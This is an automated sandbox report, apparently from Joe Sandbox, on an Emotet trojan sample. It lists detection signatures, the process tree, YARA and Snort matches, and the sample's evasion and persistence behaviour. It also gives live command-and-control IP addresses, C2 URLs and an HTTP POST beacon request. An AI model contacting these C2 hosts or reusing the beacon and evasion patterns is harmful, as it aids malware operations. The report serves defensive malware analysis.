
Analysis Report cK2ClsvtJE

Overview

General Information

Sample Name: cK2ClsvtJE (renamed file extension from none to exe)
Analysis ID: 317592
MD5: d702d5945976551dd274448376f4e7d8
SHA1: 7309409ae85f49173401b060089fbf79b4b893b6
SHA256: 05e955f0267f4e980209f79746449b83d3c176bbb2f8ea940eef07ec2818b417

Most interesting Screenshot:

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • cK2ClsvtJE.exe (PID: 6068 cmdline: 'C:\Users\user\Desktop\cK2ClsvtJE.exe' MD5: D702D5945976551DD274448376F4E7D8)
    • GlobCollationHost.exe (PID: 3164 cmdline: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe MD5: D702D5945976551DD274448376F4E7D8)
  • svchost.exe (PID: 4812 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3564 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5996 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3348 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4552 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3888 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6404 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2596 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1540 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.222966420.0000000002F21000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.221574418.0000000002A54000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.486175909.00000000028A0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.486354323.00000000028E4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000004.00000002.486498394.0000000002921000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.GlobCollationHost.exe.2920000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
1.2.cK2ClsvtJE.exe.2f20000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview



AV Detection:

Multi AV Scanner detection for submitted file
Source: cK2ClsvtJE.exe | Virustotal: Detection: 60%
Source: cK2ClsvtJE.exe | Metadefender: Detection: 43%
Source: cK2ClsvtJE.exe | ReversingLabs: Detection: 72%
Machine Learning detection for sample
Source: cK2ClsvtJE.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02922680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_029222C0 CryptExportKey,CryptDestroyHash,memcpy,CryptEncrypt,RtlAllocateHeap,CryptDuplicateHash,CryptGetHashParam,
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02921FF0 memcpy,CryptDuplicateHash,CryptDestroyHash,RtlAllocateHeap,
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F23A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02923A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.3:49718 -> 190.202.229.74:80
Source: Traffic | Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49730 -> 118.69.11.81:7080
Source: Traffic | Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.3:49732 -> 70.39.251.94:8080
Source: Traffic | Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49742 -> 87.230.25.43:8080
Source: Traffic | Snort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.3:49743 -> 94.23.62.116:8080
Source: global traffic | TCP traffic: 192.168.2.3:49730 -> 118.69.11.81:7080
Source: global traffic | TCP traffic: 192.168.2.3:49732 -> 70.39.251.94:8080
Source: global traffic | TCP traffic: 192.168.2.3:49742 -> 87.230.25.43:8080
Source: global traffic | TCP traffic: 192.168.2.3:49743 -> 94.23.62.116:8080
Source: Joe Sandbox View | IP Address: 87.230.25.43 87.230.25.43
Source: Joe Sandbox View | IP Address: 94.23.62.116 94.23.62.116
Source: Joe Sandbox View | ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: Joe Sandbox View | ASN Name: CANTVServiciosVenezuelaVE CANTVServiciosVenezuelaVE
Source: global traffic | TCP traffic: 192.168.2.3:49718 -> 190.202.229.74:80
Source: global traffic | HTTP traffic detected:
    POST /pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 94.23.62.116/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=------------------YzlUCjKU14tSkItawL
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 94.23.62.116:8080
    Content-Length: 4580
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 190.202.229.74
Source: unknown | TCP traffic detected without corresponding DNS query: 190.202.229.74
Source: unknown | TCP traffic detected without corresponding DNS query: 190.202.229.74
Source: unknown | TCP traffic detected without corresponding DNS query: 118.69.11.81
Source: unknown | TCP traffic detected without corresponding DNS query: 118.69.11.81
Source: unknown | TCP traffic detected without corresponding DNS query: 118.69.11.81
Source: unknown | TCP traffic detected without corresponding DNS query: 70.39.251.94
Source: unknown | TCP traffic detected without corresponding DNS query: 70.39.251.94
Source: unknown | TCP traffic detected without corresponding DNS query: 70.39.251.94
Source: unknown | TCP traffic detected without corresponding DNS query: 87.230.25.43
Source: unknown | TCP traffic detected without corresponding DNS query: 87.230.25.43
Source: unknown | TCP traffic detected without corresponding DNS query: 87.230.25.43
Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown | HTTP traffic detected:
    POST /pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 94.23.62.116/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=------------------YzlUCjKU14tSkItawL
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 94.23.62.116:8080
    Content-Length: 4580
    Cache-Control: no-cache
Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp | String found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/
Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp | String found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/TZ
Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp | String found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/id3Z
Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp | String found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/
Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp | String found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/dB
Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmp | String found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/pData
Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmp | String found in binary or memory: http://87.230.25.43:8080/9hZu4ZKUd2Y5T8WBm1d/YRjEk9/
Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmp | String found in binary or memory: http://87.230.25.43:8080/9hZu4ZKUd2Y5T8WBm1d/YRjEk9/X
Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmp | String found in binary or memory: http://94.23.62.116:8080/pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/
Source: svchost.exe, 00000007.00000002.488719812.000002384C614000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000007.00000002.488719812.000002384C614000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000007.00000002.488637154.000002384C600000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000007.00000002.488323548.000002384C4B0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000011.00000002.312507428.000001ABFB213000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.comr
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000003.311896345.000001ABFB249000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000003.311880922.000001ABFB263000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.312507428.000001ABFB213000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000011.00000003.311896345.000001ABFB249000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311880922.000001ABFB263000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000011.00000002.312507428.000001ABFB213000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000011.00000003.311896345.000001ABFB249000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 00000001.00000002.222966420.0000000002F21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.221574418.0000000002A54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.486175909.00000000028A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.486354323.00000000028E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.486498394.0000000002921000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.221459912.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.GlobCollationHost.exe.2920000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.cK2ClsvtJE.exe.2f20000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02922680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | File created: C:\Windows\SysWOW64\HoloShellRuntime\
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | File deleted: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe:Zone.Identifier
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F286F0
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F28330
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F23CE0
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F23EE0
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F242C9
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F241B7
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F24190
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F26860
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F27B30
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A1A28E
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A196CE
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A19ECE
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A15E67
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A27669
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A15A7E
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A183FE
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A1587E
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A15D2E
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02A15D55
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_029286F0
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02924190
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_029241B7
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_029242C9
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02923CE0
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02923EE0
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02928330
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02927B30
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02926860
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028AA28E
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A96CE
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A9ECE
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028B7669
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A5E67
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A5A7E
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A83FE
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A587E
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A5D2E
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_028A5D55
Source: cK2ClsvtJE.exe, 00000001.00000002.223365809.00000000031F0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs cK2ClsvtJE.exe
Source: cK2ClsvtJE.exe, 00000001.00000002.223365809.00000000031F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs cK2ClsvtJE.exe
Source: cK2ClsvtJE.exe, 00000001.00000002.223438087.0000000003220000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs cK2ClsvtJE.exe
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: classification engine | Classification label: mal80.troj.evad.winEXE@19/13@0/6
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle,
Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe | Code function: 4_2_02924FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification,
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Code function: 1_2_02F25390 ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3396:120:WilError_01
Source: cK2ClsvtJE.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\cK2ClsvtJE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: cK2ClsvtJE.exe | Virustotal: Detection: 60%
